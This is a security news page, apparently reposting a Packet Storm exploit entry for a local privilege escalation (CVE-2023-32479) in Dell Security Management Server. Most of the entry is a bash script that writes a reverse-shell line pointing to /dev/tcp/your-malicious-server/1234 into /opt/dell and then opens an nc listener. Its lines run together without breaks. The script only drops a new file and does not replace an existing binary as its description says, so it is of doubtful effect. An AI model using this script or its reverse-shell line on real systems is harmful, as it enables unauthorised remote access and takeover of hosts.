Security
Headlines
HeadlinesLatestCVEs

Headline

Dell Security Management Server Privilege Escalation

Dell Security Management Server versions prior to 11.9.0 suffer from a local privilege escalation vulnerability.

Packet Storm
#vulnerability#auth#dell
# Exploit Title: [title] Dell Security Management Server versions prior to11.9.0# Exploit Author: [author] Amirhossein Bahramizadeh# CVE : [if applicable] CVE-2023-32479Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell SecurityManagementServer versions prior to 11.9.0 contain privilege escalation vulnerabilitydue to improper ACL of the non-default installation directory. A localmalicious user could potentially exploit this vulnerability by replacingbinaries in installed directory and taking the reverse shell of the systemleading to Privilege Escalation.#!/bin/bashINSTALL_DIR="/opt/dell"# Check if the installed directory has improper ACLsif [ -w "$INSTALL_DIR" ]; then    # Replace a binary in the installed directory with a malicious binary that opens a reverse shell    echo "#!/bin/bash" > "$INSTALL_DIR/dell-exploit"    echo "bash -i >& /dev/tcp/your-malicious-server/1234 0>&1" >> "$INSTALL_DIR/dell-exploit"    chmod +x "$INSTALL_DIR/dell-exploit"    # Wait for the reverse shell to connect to your malicious server    nc -lvnp 1234fi

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution